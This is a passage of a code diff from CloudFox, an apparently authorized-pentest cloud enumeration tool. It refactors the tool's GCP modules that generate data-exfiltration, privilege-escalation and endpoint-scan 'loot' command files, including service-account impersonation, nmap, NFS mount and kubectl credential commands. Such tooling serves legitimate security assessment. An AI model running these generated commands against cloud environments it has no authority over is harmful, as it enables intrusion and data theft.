"serviceAccount" + } else { + principalType = "user" + } + } + + sb.WriteString(fmt.Sprintf("## %s (%s)\n", p.Principal, principalType)) + + // Add impersonation command if it's a service account + if p.IsServiceAccount { + sb.WriteString(fmt.Sprintf("# Impersonate first:\ngcloud config set auth/impersonate_service_account %s\n\n", p.Principal)) + } + + // Add the exploitation command + cmd := getExploitCommand(finding.Permission, p.Principal, project) + sb.WriteString(cmd) + sb.WriteString("\n\n") + + // Reset impersonation note + if p.IsServiceAccount { + sb.WriteString("# Reset impersonation when done:\n# gcloud config unset auth/impersonate_service_account\n\n") + } } } } + contents := sb.String() + // Don't return empty loot file + if contents == fmt.Sprintf("# GCP Data Exfiltration Commands\n# Project: %s\n# Generated by CloudFox\n\n", projectID) { + return nil + } + return &internal.LootFile{ - Name: "data-exfiltration-playbook", - Contents: sb.String(), + Name: "data-exfiltration-commands", + Contents: contents, } } @@ -1041,11 +1281,13 @@ func (m *DataExfiltrationModule) getMisconfigHeader() []string { func (m *DataExfiltrationModule) getFoxMapperHeader() []string { return []string{ - "Technique", + "Scope Type", + "Scope ID", + "Principal Type", + "Principal", "Service", "Permission", "Description", - "Principal Count", } } @@ -1094,20 +1336,222 @@ func (m *DataExfiltrationModule) pathsToTableBody(paths []ExfiltrationPath, expo return body } +// foxMapperFindingsForProject returns findings for a specific project +// Includes: SAs from that project + users/groups (which can access any project) +// Also filters by scope: only org/folder/project findings in the project's hierarchy +func (m *DataExfiltrationModule) foxMapperFindingsForProject(projectID string) [][]string { + var body [][]string + + // Get ancestor folders and org for filtering + var ancestorFolders []string + var projectOrgID string + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + ancestorFolders = m.OrgCache.GetProjectAncestorFolders(projectID) + projectOrgID = m.OrgCache.GetProjectOrgID(projectID) + } + ancestorFolderSet := make(map[string]bool) + for _, f := range ancestorFolders { + ancestorFolderSet[f] = true + } + + for _, f := range m.FoxMapperFindings { + for _, p := range f.Principals { + principalProject := extractProjectFromPrincipal(p.Principal, m.OrgCache) + + // Include if: SA from this project OR user/group (no project - applies to all) + if principalProject != projectID && principalProject != "" { + continue + } + + // Filter by scope hierarchy + if !m.scopeMatchesProject(p.ScopeType, p.ScopeID, projectID, projectOrgID, ancestorFolderSet) { + continue + } + + // Determine principal type + principalType := p.MemberType + if principalType == "" { + if p.IsServiceAccount { + principalType = "serviceAccount" + } else { + principalType = "user" + } + } + + scopeType := p.ScopeType + if scopeType == "" { + scopeType = "-" + } + scopeID := p.ScopeID + if scopeID == "" { + scopeID = "-" + } + + body = append(body, []string{ + scopeType, + scopeID, + principalType, + p.Principal, + f.Service, + f.Permission, + f.Description, + }) + } + } + return body +} + +// foxMapperFindingsWithoutProject returns findings for principals without a clear project +// (e.g., compute default SAs, users, groups) +func (m *DataExfiltrationModule) foxMapperFindingsWithoutProject() [][]string { + var body [][]string + for _, f := range m.FoxMapperFindings { + for _, p := range f.Principals { + // Extract project from principal + principalProject := extractProjectFromPrincipal(p.Principal, m.OrgCache) + + // Only include if we couldn't determine the project + if principalProject != "" { + continue + } + + // Determine principal type + principalType := p.MemberType + if principalType == "" { + if p.IsServiceAccount { + principalType = "serviceAccount" + } else { + principalType = "user" + } + } + + scopeType := p.ScopeType + if scopeType == "" { + scopeType = "-" + } + scopeID := p.ScopeID + if scopeID == "" { + scopeID = "-" + } + + body = append(body, []string{ + scopeType, + scopeID, + principalType, + p.Principal, + f.Service, + f.Permission, + f.Description, + }) + } + } + return body +} + +// foxMapperFindingsToTableBodyForProject returns findings filtered by project +func (m *DataExfiltrationModule) foxMapperFindingsToTableBodyForProject(projectID string) [][]string { + var body [][]string + for _, f := range m.FoxMapperFindings { + for _, p := range f.Principals { + // Extract project from principal (uses existing function from privesc.go) + principalProject := extractProjectFromPrincipal(p.Principal, m.OrgCache) + + // Only include if it matches this project + if principalProject != projectID { + continue + } + + // Determine principal type + principalType := p.MemberType + if principalType == "" { + if p.IsServiceAccount { + principalType = "serviceAccount" + } else { + principalType = "user" + } + } + + body = append(body, []string{ + principalProject, + principalType, + p.Principal, + f.Service, + f.Permission, + f.Description, + }) + } + } + return body +} + +// foxMapperFindingsToTableBody returns all findings (for flat output) func (m *DataExfiltrationModule) foxMapperFindingsToTableBody() [][]string { var body [][]string for _, f := range m.FoxMapperFindings { - body = append(body, []string{ - f.Technique, - f.Service, - f.Permission, - f.Description, - fmt.Sprintf("%d", len(f.Principals)), - }) + for _, p := range f.Principals { + // Determine principal type + principalType := p.MemberType + if principalType == "" { + if p.IsServiceAccount { + principalType = "serviceAccount" + } else { + principalType = "user" + } + } + + scopeType := p.ScopeType + if scopeType == "" { + scopeType = "-" + } + scopeID := p.ScopeID + if scopeID == "" { + scopeID = "-" + } + + body = append(body, []string{ + scopeType, + scopeID, + principalType, + p.Principal, + f.Service, + f.Permission, + f.Description, + }) + } } return body } +// scopeMatchesProject checks if a scope (org/folder/project) is in the hierarchy for a project +func (m *DataExfiltrationModule) scopeMatchesProject(scopeType, scopeID, projectID, projectOrgID string, ancestorFolderSet map[string]bool) bool { + if scopeType == "" || scopeID == "" { + // No scope info - include by default + return true + } + + switch scopeType { + case "project": + return scopeID == projectID + case "organization": + if projectOrgID != "" { + return scopeID == projectOrgID + } + // No org info - include by default + return true + case "folder": + if len(ancestorFolderSet) > 0 { + return ancestorFolderSet[scopeID] + } + // No folder info - include by default + return true + case "resource": + // Resource-level - include by default + return true + default: + return true + } +} + func (m *DataExfiltrationModule) buildTablesForProject(projectID string) []internal.TableFile { var tableFiles []internal.TableFile @@ -1131,25 +1575,28 @@ func (m *DataExfiltrationModule) buildTablesForProject(projectID string) []inter func (m *DataExfiltrationModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { outputData := internal.HierarchicalOutputData{ OrgLevelData: make(map[string]internal.CloudfoxOutput), + FolderLevelData: make(map[string]internal.CloudfoxOutput), ProjectLevelData: make(map[string]internal.CloudfoxOutput), } - projectIDs := make(map[string]bool) - for projectID := range m.ProjectExfiltrationPaths { - projectIDs[projectID] = true - } - for projectID := range m.ProjectPublicExports { - projectIDs[projectID] = true - } - - playbook := m.generatePlaybook() - playbookAdded := false - - for projectID := range projectIDs { + // Process each specified project (via -p or -l flags) + for _, projectID := range m.ProjectIDs { m.initializeLootForProject(projectID) tableFiles := m.buildTablesForProject(projectID) + // Add FoxMapper findings table for this project + // Include SAs from this project + users/groups (which apply to all projects) + foxMapperBody := m.foxMapperFindingsForProject(projectID) + if len(foxMapperBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "data-exfiltration-permissions", + Header: m.getFoxMapperHeader(), + Body: foxMapperBody, + }) + } + + // Add loot files for this project var lootFiles []internal.LootFile if projectLoot, ok := m.LootMap[projectID]; ok { for _, loot := range projectLoot { @@ -1159,28 +1606,16 @@ func (m *DataExfiltrationModule) writeHierarchicalOutput(ctx context.Context, lo } } - if playbook != nil && playbook.Contents != "" && !playbookAdded { + // Add project-specific playbook + playbook := m.generatePlaybookForProject(projectID) + if playbook != nil && playbook.Contents != "" { lootFiles = append(lootFiles, *playbook) - playbookAdded = true } + // Always add all specified projects to output outputData.ProjectLevelData[projectID] = DataExfiltrationOutput{Table: tableFiles, Loot: lootFiles} } - // Add FoxMapper findings table at first project level if exists - if len(m.FoxMapperFindings) > 0 && len(m.ProjectIDs) > 0 { - firstProject := m.ProjectIDs[0] - if existing, ok := outputData.ProjectLevelData[firstProject]; ok { - existingOutput := existing.(DataExfiltrationOutput) - existingOutput.Table = append(existingOutput.Table, internal.TableFile{ - Name: "data-exfiltration-permissions", - Header: m.getFoxMapperHeader(), - Body: m.foxMapperFindingsToTableBody(), - }) - outputData.ProjectLevelData[firstProject] = existingOutput - } - } - pathBuilder := m.BuildPathBuilder() err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) @@ -1225,9 +1660,14 @@ func (m *DataExfiltrationModule) writeFlatOutput(ctx context.Context, logger int } } - playbook := m.generatePlaybook() - if playbook != nil && playbook.Contents != "" { - lootFiles = append(lootFiles, *playbook) + // For flat output, generate a combined playbook for all projects + for _, projectID := range m.ProjectIDs { + playbook := m.generatePlaybookForProject(projectID) + if playbook != nil && playbook.Contents != "" { + // Rename to include project + playbook.Name = fmt.Sprintf("data-exfiltration-commands-%s", projectID) + lootFiles = append(lootFiles, *playbook) + } } output := DataExfiltrationOutput{ diff --git a/gcp/commands/domainwidedelegation.go b/gcp/commands/domainwidedelegation.go old mode 100644 new mode 100755 index dd360708..818c737b --- a/gcp/commands/domainwidedelegation.go +++ b/gcp/commands/domainwidedelegation.go @@ -521,27 +521,6 @@ func (m *DomainWideDelegationModule) generateDWDCommands(accounts []domainwidede # Generated by CloudFox # WARNING: Only use with proper authorization -# ============================================================================= -# DISCOVERED DWD SERVICE ACCOUNTS -# ============================================================================= -`) - - for _, account := range accounts { - dwdStatus := "No" - if account.DWDEnabled { - dwdStatus = "Yes" - } - commands.WriteString(fmt.Sprintf("\n# %s\n", account.Email)) - commands.WriteString(fmt.Sprintf("# DWD Enabled: %s | Keys: %d\n", dwdStatus, len(account.Keys))) - if account.OAuth2ClientID != "" { - commands.WriteString(fmt.Sprintf("# OAuth2 Client ID: %s\n", account.OAuth2ClientID)) - } - for _, key := range account.Keys { - commands.WriteString(fmt.Sprintf("# Key: %s\n", key.KeyID)) - } - } - - commands.WriteString(` # ============================================================================= # STEP 1: INSTALL DEPENDENCIES # ============================================================================= diff --git a/gcp/commands/endpoints.go b/gcp/commands/endpoints.go old mode 100644 new mode 100755 index edb10ee7..ac27ba04 --- a/gcp/commands/endpoints.go +++ b/gcp/commands/endpoints.go @@ -84,8 +84,7 @@ type Endpoint struct { type EndpointsModule struct { gcpinternal.BaseGCPModule - ProjectEndpoints map[string][]Endpoint // projectID -> endpoints - LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + ProjectEndpoints map[string][]Endpoint // projectID -> endpoints mu sync.Mutex // Firewall rule mapping: "network:tag1,tag2" -> allowed ports @@ -115,7 +114,6 @@ func runGCPEndpointsCommand(cmd *cobra.Command, args []string) { module := &EndpointsModule{ BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), ProjectEndpoints: make(map[string][]Endpoint), - LootMap: make(map[string]map[string]*internal.LootFile), firewallPortMap: make(map[string][]string), } @@ -1135,18 +1133,7 @@ func (m *EndpointsModule) analyzeFirewallRules(ctx context.Context, svc *compute // addEndpoint adds an endpoint thread-safely func (m *EndpointsModule) addEndpoint(projectID string, ep Endpoint) { m.mu.Lock() - // Initialize loot for this project if needed - if m.LootMap[projectID] == nil { - m.LootMap[projectID] = make(map[string]*internal.LootFile) - m.LootMap[projectID]["endpoints-commands"] = &internal.LootFile{ - Name: "endpoints-commands", - Contents: "# Endpoint Scan Commands\n" + - "# Generated by CloudFox\n" + - "# Use these commands for authorized penetration testing\n\n", - } - } m.ProjectEndpoints[projectID] = append(m.ProjectEndpoints[projectID], ep) - m.addEndpointToLoot(projectID, ep) m.mu.Unlock() } @@ -1183,11 +1170,93 @@ func extractZoneFromScope(scope string) string { // ------------------------------ // Loot File Management // ------------------------------ -func (m *EndpointsModule) addEndpointToLoot(projectID string, ep Endpoint) { - lootFile := m.LootMap[projectID]["endpoints-commands"] - if lootFile == nil { - return + +// generateLootFiles creates the loot files for a project, grouped by network/region +func (m *EndpointsModule) generateLootFiles(projectID string) []internal.LootFile { + endpoints, ok := m.ProjectEndpoints[projectID] + if !ok || len(endpoints) == 0 { + return nil } + + // Separate external and internal endpoints + var externalEndpoints, internalEndpoints []Endpoint + for _, ep := range endpoints { + if ep.IsExternal { + externalEndpoints = append(externalEndpoints, ep) + } else { + internalEndpoints = append(internalEndpoints, ep) + } + } + + var lootFiles []internal.LootFile + + // Generate external commands file + if len(externalEndpoints) > 0 { + lootFiles = append(lootFiles, internal.LootFile{ + Name: "endpoints-external-commands", + Contents: m.generateGroupedCommands(externalEndpoints, true), + }) + } + + // Generate internal commands file + if len(internalEndpoints) > 0 { + lootFiles = append(lootFiles, internal.LootFile{ + Name: "endpoints-internal-commands", + Contents: m.generateGroupedCommands(internalEndpoints, false), + }) + } + + return lootFiles +} + +// generateGroupedCommands creates commands grouped by network +func (m *EndpointsModule) generateGroupedCommands(endpoints []Endpoint, isExternal bool) string { + var contents strings.Builder + + if isExternal { + contents.WriteString("# External Endpoint Scan Commands\n") + contents.WriteString("# Generated by CloudFox\n") + contents.WriteString("# These endpoints are internet-facing\n\n") + } else { + contents.WriteString("# Internal Endpoint Scan Commands\n") + contents.WriteString("# Generated by CloudFox\n") + contents.WriteString("# These endpoints require internal network access (VPN, bastion, etc.)\n\n") + } + + // Group endpoints by network (same VPC = same firewall rules) + groups := make(map[string][]Endpoint) + var groupOrder []string + + for _, ep := range endpoints { + network := ep.Network + if network == "" { + network = "default" + } + if _, exists := groups[network]; !exists { + groupOrder = append(groupOrder, network) + } + groups[network] = append(groups[network], ep) + } + + // Generate commands for each network group + for _, network := range groupOrder { + groupEndpoints := groups[network] + + contents.WriteString(fmt.Sprintf("# =============================================================================\n")) + contents.WriteString(fmt.Sprintf("# Network: %s\n", network)) + contents.WriteString(fmt.Sprintf("# =============================================================================\n\n")) + + // Generate commands for each endpoint in the group + for _, ep := range groupEndpoints { + m.writeEndpointCommand(&contents, ep) + } + } + + return contents.String() +} + +// writeEndpointCommand writes the command for a single endpoint +func (m *EndpointsModule) writeEndpointCommand(contents *strings.Builder, ep Endpoint) { // Determine best target for scanning target := ep.ExternalIP if target == "" { @@ -1200,34 +1269,18 @@ func (m *EndpointsModule) addEndpointToLoot(projectID string, ep Endpoint) { return } - exposure := "INTERNAL" - if ep.IsExternal { - exposure = "EXTERNAL" - } - - lootFile.Contents += fmt.Sprintf( - "# [%s] %s: %s (%s)\n"+ - "# Project: %s | Region: %s | Network: %s\n", - exposure, ep.Type, ep.Name, ep.ResourceType, - ep.ProjectID, ep.Region, ep.Network, - ) - - if ep.Security != "" { - lootFile.Contents += fmt.Sprintf("# Security: %s\n", ep.Security) - } + // Write endpoint header (just type and name) + contents.WriteString(fmt.Sprintf("# %s: %s\n", ep.Type, ep.Name)) // Generate appropriate commands based on type switch ep.Type { case "Cloud Run", "Cloud Function", "Composer Airflow", "App Engine", "Vertex AI Notebook": if ep.Hostname != "" { - lootFile.Contents += fmt.Sprintf("curl -v https://%s\n\n", ep.Hostname) + contents.WriteString(fmt.Sprintf("curl -v https://%s\n\n", ep.Hostname)) } case "GKE API": - lootFile.Contents += fmt.Sprintf( - "# Get cluster credentials:\n"+ - "gcloud container clusters get-credentials %s --region=%s --project=%s\n"+ - "kubectl cluster-info\n\n", - ep.Name, ep.Region, ep.ProjectID) + contents.WriteString(fmt.Sprintf("gcloud container clusters get-credentials %s --region=%s --project=%s\n", ep.Name, ep.Region, ep.ProjectID)) + contents.WriteString("kubectl cluster-info\n\n") case "Cloud SQL": protocol := "mysql" if strings.Contains(ep.Port, "5432") { @@ -1235,51 +1288,32 @@ func (m *EndpointsModule) addEndpointToLoot(projectID string, ep Endpoint) { } else if strings.Contains(ep.Port, "1433") { protocol = "sqlcmd" } - lootFile.Contents += fmt.Sprintf( - "# Connect to database:\n"+ - "# %s -h %s -P %s -u USERNAME\n"+ - "nmap -sV -Pn -p %s %s\n\n", - protocol, target, ep.Port, ep.Port, target) + contents.WriteString(fmt.Sprintf("# %s -h %s -P %s -u USERNAME\n", protocol, target, ep.Port)) + contents.WriteString(fmt.Sprintf("nmap -sV -Pn -p %s %s\n\n", ep.Port, target)) case "Redis": - lootFile.Contents += fmt.Sprintf( - "redis-cli -h %s -p %s\n"+ - "nmap -sV -Pn -p %s %s\n\n", - target, ep.Port, ep.Port, target) + contents.WriteString(fmt.Sprintf("redis-cli -h %s -p %s\n", target, ep.Port)) + contents.WriteString(fmt.Sprintf("nmap -sV -Pn -p %s %s\n\n", ep.Port, target)) case "Filestore NFS": - lootFile.Contents += fmt.Sprintf( - "showmount -e %s\n"+ - "sudo mount -t nfs %s:/ /mnt/\n\n", - target, target) + contents.WriteString(fmt.Sprintf("showmount -e %s\n", target)) + contents.WriteString(fmt.Sprintf("sudo mount -t nfs %s:/ /mnt/\n\n", target)) case "Dataproc Master": - lootFile.Contents += fmt.Sprintf( - "# SSH to master node:\n"+ - "gcloud compute ssh %s --project=%s --zone=\n"+ - "# Web UIs: YARN (8088), HDFS (9870), Spark (8080)\n\n", - strings.TrimSuffix(ep.Name, "-master"), ep.ProjectID) + contents.WriteString(fmt.Sprintf("gcloud compute ssh %s --project=%s --zone=\n", strings.TrimSuffix(ep.Name, "-master"), ep.ProjectID)) + contents.WriteString("# Web UIs: YARN (8088), HDFS (9870), Spark (8080)\n\n") case "VPN Gateway", "HA VPN Gateway": - lootFile.Contents += fmt.Sprintf( - "# VPN Gateway IP: %s\n"+ - "# Ports: 500/UDP (IKE), 4500/UDP (NAT-T), ESP\n"+ - "nmap -sU -Pn -p 500,4500 %s\n\n", - target, target) + contents.WriteString(fmt.Sprintf("# VPN Gateway IP: %s (ports 500/UDP, 4500/UDP, ESP)\n", target)) + contents.WriteString(fmt.Sprintf("nmap -sU -Pn -p 500,4500 %s\n\n", target)) case "Pub/Sub Push": - lootFile.Contents += fmt.Sprintf( - "# Push endpoint (receives messages from Pub/Sub):\n"+ - "curl -v https://%s\n\n", - ep.Hostname) + contents.WriteString(fmt.Sprintf("curl -v https://%s\n\n", ep.Hostname)) default: - var nmapCmd string - switch { - case ep.Port == "ALL" || ep.Port == "": - nmapCmd = fmt.Sprintf("nmap -sV -Pn %s", target) - default: - nmapCmd = fmt.Sprintf("nmap -sV -Pn -p %s %s", ep.Port, target) + if ep.Port == "ALL" || ep.Port == "" { + contents.WriteString(fmt.Sprintf("nmap -sV -Pn %s\n", target)) + } else { + contents.WriteString(fmt.Sprintf("nmap -sV -Pn -p %s %s\n", ep.Port, target)) } - lootFile.Contents += nmapCmd + "\n\n" - if ep.TLSEnabled || ep.Port == "443" { - lootFile.Contents += fmt.Sprintf("curl -vk https://%s/\n\n", target) + contents.WriteString(fmt.Sprintf("curl -vk https://%s/\n", target)) } + contents.WriteString("\n") } } @@ -1391,15 +1425,7 @@ func (m *EndpointsModule) writeHierarchicalOutput(ctx context.Context, logger in for projectID := range m.ProjectEndpoints { tableFiles := m.buildTablesForProject(projectID) - - var lootFiles []internal.LootFile - if projectLoot, ok := m.LootMap[projectID]; ok { - for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" { - lootFiles = append(lootFiles, *loot) - } - } - } + lootFiles := m.generateLootFiles(projectID) outputData.ProjectLevelData[projectID] = EndpointsOutput{Table: tableFiles, Loot: lootFiles} } @@ -1425,14 +1451,31 @@ func (m *EndpointsModule) writeFlatOutput(ctx context.Context, logger internal.L }) } - // Collect loot files + // Generate loot files from all endpoints combined var lootFiles []internal.LootFile - for _, projectLoot := range m.LootMap { - for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" { - lootFiles = append(lootFiles, *loot) + if len(allEndpoints) > 0 { + // Separate external and internal endpoints + var externalEndpoints, internalEndpoints []Endpoint + for _, ep := range allEndpoints { + if ep.IsExternal { + externalEndpoints = append(externalEndpoints, ep) + } else { + internalEndpoints = append(internalEndpoints, ep) } } + + if len(externalEndpoints) > 0 { + lootFiles = append(lootFiles, internal.LootFile{ + Name: "endpoints-external-commands", + Contents: m.generateGroupedCommands(externalEndpoints, true), + }) + } + if len(internalEndpoints) > 0 { + lootFiles = append(lootFiles, internal.LootFile{ + Name: "endpoints-internal-commands", + Contents: m.generateGroupedCommands(internalEndpoints, false), + }) + } } output := EndpointsOutput{ diff --git a/gcp/commands/foxmapper.go b/gcp/commands/foxmapper.go old mode 100644 new mode 100755 index 5d672bc5..7285f5ff --- a/gcp/commands/foxmapper.go +++ b/gcp/commands/foxmapper.go @@ -75,6 +75,7 @@ type FoxMapperModule struct { OrgID string ProjectID string DataPath string + OrgCache *gcpinternal.OrgCache // Output data Admins []*foxmapperservice.Node @@ -112,6 +113,9 @@ func runGCPFoxMapperCommand(cmd *cobra.Command, args []string) { } func (m *FoxMapperModule) Execute(ctx context.Context, logger internal.Logger) { + // Get OrgCache for project number resolution + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + logger.InfoM("Looking for FoxMapper data and building privilege escalation graph...", "foxmapper") // Custom path specified - load directly @@ -252,7 +256,8 @@ func (m *FoxMapperModule) generateOutputForProject(logger internal.Logger, proje var output FoxMapperOutput // Main table: principals with admin or path to admin - mainHeader := []string{"Principal", "Type", "Project", "Is Admin", "Admin Level", "Path to Admin", "Privesc To", "Hops"} + // Read left to right: Project -> Type -> Principal -> Admin Status -> Privesc Target -> Privesc Admin Level -> Hops + mainHeader := []string{"Project", "Type", "Principal", "Is Admin", "Admin Level", "Privesc To", "Privesc Admin Level", "Hops"} var mainBody [][]string // First add admins @@ -262,10 +267,10 @@ func (m *FoxMapperModule) generateOutputForProject(logger internal.Logger, proje adminLevel = "project" } mainBody = append(mainBody, []string{ - admin.Email, - admin.MemberType, admin.ProjectID, - "YES", + admin.MemberType, + admin.Email, + "Yes", adminLevel, "-", "-", @@ -278,25 +283,66 @@ func (m *FoxMapperModule) generateOutputForProject(logger internal.Logger, proje paths := fm.GetPrivescPaths(node.Email) shortestPath := "-" privescTo := "-" + privescAdminLevel := "-" if len(paths) > 0 { - shortestPath = strconv.Itoa(paths[0].HopCount) + bestPath := paths[0] + shortestPath = strconv.Itoa(bestPath.HopCount) // Get the destination (admin) from the best path - privescTo = paths[0].Destination + privescTo = bestPath.Destination // Clean up the display if strings.HasPrefix(privescTo, "serviceAccount:") { privescTo = strings.TrimPrefix(privescTo, "serviceAccount:") } else if strings.HasPrefix(privescTo, "user:") { privescTo = strings.TrimPrefix(privescTo, "user:") } + + // Format privesc admin level + destNode := fm.GetNode(bestPath.Destination) + switch bestPath.AdminLevel { + case "org": + privescAdminLevel = "Org" + case "folder": + // Try to extract folder from the destination node's IAM bindings + if destNode != nil && len(destNode.IAMBindings) > 0 { + for _, binding := range destNode.IAMBindings { + if resource, ok := binding["resource"].(string); ok { + if strings.HasPrefix(resource, "folders/") { + folderID := strings.TrimPrefix(resource, "folders/") + privescAdminLevel = fmt.Sprintf("Folder: %s", folderID) + break + } + } + } + } + if privescAdminLevel == "-" { + privescAdminLevel = "Folder" + } + case "project": + // Try to get the project ID from the destination node or principal + if destNode != nil && destNode.ProjectID != "" { + privescAdminLevel = fmt.Sprintf("Project: %s", destNode.ProjectID) + } else { + destProject := extractProjectFromPrincipal(bestPath.Destination, m.OrgCache) + if destProject != "" { + privescAdminLevel = fmt.Sprintf("Project: %s", destProject) + } else { + privescAdminLevel = "Project" + } + } + default: + if bestPath.AdminLevel != "" { + privescAdminLevel = bestPath.AdminLevel + } + } } mainBody = append(mainBody, []string{ - node.Email, - node.MemberType, node.ProjectID, + node.MemberType, + node.Email, "No", "-", - "YES", privescTo, + privescAdminLevel, shortestPath, }) } @@ -473,7 +519,8 @@ func (m *FoxMapperModule) generateOutput(logger internal.Logger, identifier stri var output FoxMapperOutput // Main table: principals with admin or path to admin - mainHeader := []string{"Principal", "Type", "Project", "Is Admin", "Admin Level", "Path to Admin", "Privesc To", "Hops"} + // Read left to right: Project -> Type -> Principal -> Admin Status -> Privesc Target -> Privesc Admin Level -> Hops + mainHeader := []string{"Project", "Type", "Principal", "Is Admin", "Admin Level", "Privesc To", "Privesc Admin Level", "Hops"} var mainBody [][]string // First add admins @@ -483,10 +530,10 @@ func (m *FoxMapperModule) generateOutput(logger internal.Logger, identifier stri adminLevel = "project" } mainBody = append(mainBody, []string{ - admin.Email, - admin.MemberType, admin.ProjectID, - "YES", + admin.MemberType, + admin.Email, + "Yes", adminLevel, "-", "-", @@ -499,25 +546,66 @@ func (m *FoxMapperModule) generateOutput(logger internal.Logger, identifier stri paths := m.FoxMapper.GetPrivescPaths(node.Email) shortestPath := "-" privescTo := "-" + privescAdminLevel := "-" if len(paths) > 0 { - shortestPath = strconv.Itoa(paths[0].HopCount) + bestPath := paths[0] + shortestPath = strconv.Itoa(bestPath.HopCount) // Get the destination (admin) from the best path - privescTo = paths[0].Destination + privescTo = bestPath.Destination // Clean up the display if strings.HasPrefix(privescTo, "serviceAccount:") { privescTo = strings.TrimPrefix(privescTo, "serviceAccount:") } else if strings.HasPrefix(privescTo, "user:") { privescTo = strings.TrimPrefix(privescTo, "user:") } + + // Format privesc admin level + destNode := m.FoxMapper.GetNode(bestPath.Destination) + switch bestPath.AdminLevel { + case "org": + privescAdminLevel = "Org" + case "folder": + // Try to extract folder from the destination node's IAM bindings + if destNode != nil && len(destNode.IAMBindings) > 0 { + for _, binding := range destNode.IAMBindings { + if resource, ok := binding["resource"].(string); ok { + if strings.HasPrefix(resource, "folders/") { + folderID := strings.TrimPrefix(resource, "folders/") + privescAdminLevel = fmt.Sprintf("Folder: %s", folderID) + break + } + } + } + } + if privescAdminLevel == "-" { + privescAdminLevel = "Folder" + } + case "project": + // Try to get the project ID from the destination node or principal + if destNode != nil && destNode.ProjectID != "" { + privescAdminLevel = fmt.Sprintf("Project: %s", destNode.ProjectID) + } else { + destProject := extractProjectFromPrincipal(bestPath.Destination, m.OrgCache) + if destProject != "" { + privescAdminLevel = fmt.Sprintf("Project: %s", destProject) + } else { + privescAdminLevel = "Project" + } + } + default: + if bestPath.AdminLevel != "" { + privescAdminLevel = bestPath.AdminLevel + } + } } mainBody = append(mainBody, []string{ - node.Email, - node.MemberType, node.ProjectID, + node.MemberType, + node.Email, "No", "-", - "YES", privescTo, + privescAdminLevel, shortestPath, }) } diff --git a/gcp/commands/functions.go b/gcp/commands/functions.go old mode 100644 new mode 100755 index 5606b497..e6110392 --- a/gcp/commands/functions.go +++ b/gcp/commands/functions.go @@ -390,7 +390,8 @@ func (m *FunctionsModule) writeFlatOutput(ctx context.Context, logger internal.L func isEmptyLootFile(contents string) bool { return strings.HasSuffix(contents, "# WARNING: Only use with proper authorization\n\n") || strings.HasSuffix(contents, "# Variable names that may hint at secrets\n\n") || - strings.HasSuffix(contents, "# Secrets used by functions (names only)\n\n") + strings.HasSuffix(contents, "# Secrets used by functions (names only)\n\n") || + strings.HasSuffix(contents, "# Generated by CloudFox\n\n") } // buildTablesForProject builds all tables for a given project's functions diff --git a/gcp/commands/gke.go b/gcp/commands/gke.go old mode 100644 new mode 100755 index 5aac1f6d..94b3120c --- a/gcp/commands/gke.go +++ b/gcp/commands/gke.go @@ -1,12 +1,13 @@ package commands import ( - "github.com/BishopFox/cloudfox/gcp/shared" "context" "fmt" "strings" "sync" + "github.com/BishopFox/cloudfox/gcp/shared" + GKEService "github.com/BishopFox/cloudfox/gcp/services/gkeService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" @@ -49,7 +50,9 @@ Attack Surface: - Default service accounts may have excessive permissions - Legacy ABAC allows broader access than RBAC - Autopilot clusters have reduced attack surface -- Binary Authorization prevents untrusted container images`, +- Binary Authorization prevents untrusted container images + +TIP: Run 'workload-identity' to enumerate K8s SA -> GCP SA bindings and Workload Identity Federation (external identity pools/providers).`, Run: runGCPGKECommand, } @@ -60,10 +63,10 @@ type GKEModule struct { gcpinternal.BaseGCPModule // Module-specific fields - per-project for hierarchical output - ProjectClusters map[string][]GKEService.ClusterInfo // projectID -> clusters - ProjectNodePools map[string][]GKEService.NodePoolInfo // projectID -> node pools - LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper graph data (preferred) + ProjectClusters map[string][]GKEService.ClusterInfo // projectID -> clusters + ProjectNodePools map[string][]GKEService.NodePoolInfo // projectID -> node pools + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper graph data (preferred) mu sync.Mutex } @@ -203,15 +206,22 @@ func (m *GKEModule) addClusterToLoot(projectID string, cluster GKEService.Cluste } lootFile.Contents += fmt.Sprintf( - "# Cluster: %s (%s)\n"+ - "# Project: %s\n"+ - "gcloud container clusters describe %s --location=%s --project=%s\n"+ - "gcloud container clusters get-credentials %s --location=%s --project=%s\n"+ + "#### Cluster: %s (%s)\n"+ + "### Project: %s\n\n"+ + "# Get detailed cluster configuration and settings\n"+ + "gcloud container clusters describe %s --location=%s --project=%s\n\n"+ + "# Configure kubectl to authenticate to this cluster\n"+ + "gcloud container clusters get-credentials %s --location=%s --project=%s\n\n"+ + "# List all node pools in this cluster\n"+ "gcloud container node-pools list --cluster=%s --location=%s --project=%s\n\n"+ - "# kubectl commands (after getting credentials):\n"+ - "kubectl cluster-info\n"+ - "kubectl get nodes -o wide\n"+ - "kubectl get namespaces\n"+ + "# kubectl commands (after getting credentials):\n\n"+ + "# Show cluster endpoint and services info\n"+ + "kubectl cluster-info\n\n"+ + "# List all nodes with additional details (IP, OS, runtime)\n"+ + "kubectl get nodes -o wide\n\n"+ + "# List all namespaces in the cluster\n"+ + "kubectl get namespaces\n\n"+ + "# Check what actions you can perform in the cluster\n"+ "kubectl auth can-i --list\n\n", cluster.Name, cluster.Location, cluster.ProjectID, @@ -379,8 +389,8 @@ func (m *GKEModule) buildTablesForProject(clusters []GKEService.ClusterInfo, nod // Node pools table - node-level details including hardware security (like instances module) nodePoolHeader := []string{ "Project", "Cluster", "Node Pool", "Machine Type", "Node Count", - "Service Account", "SA Attack Paths", "SA Scopes", "SA Scope Summary", "Auto Upgrade", "Secure Boot", "Integrity", "Preemptible", + "Service Account", "SA Attack Paths", "SA Scopes", "SA Scope Summary", } var nodePoolBody [][]string @@ -409,10 +419,11 @@ func (m *GKEModule) buildTablesForProject(clusters []GKEService.ClusterInfo, nod nodePoolBody = append(nodePoolBody, 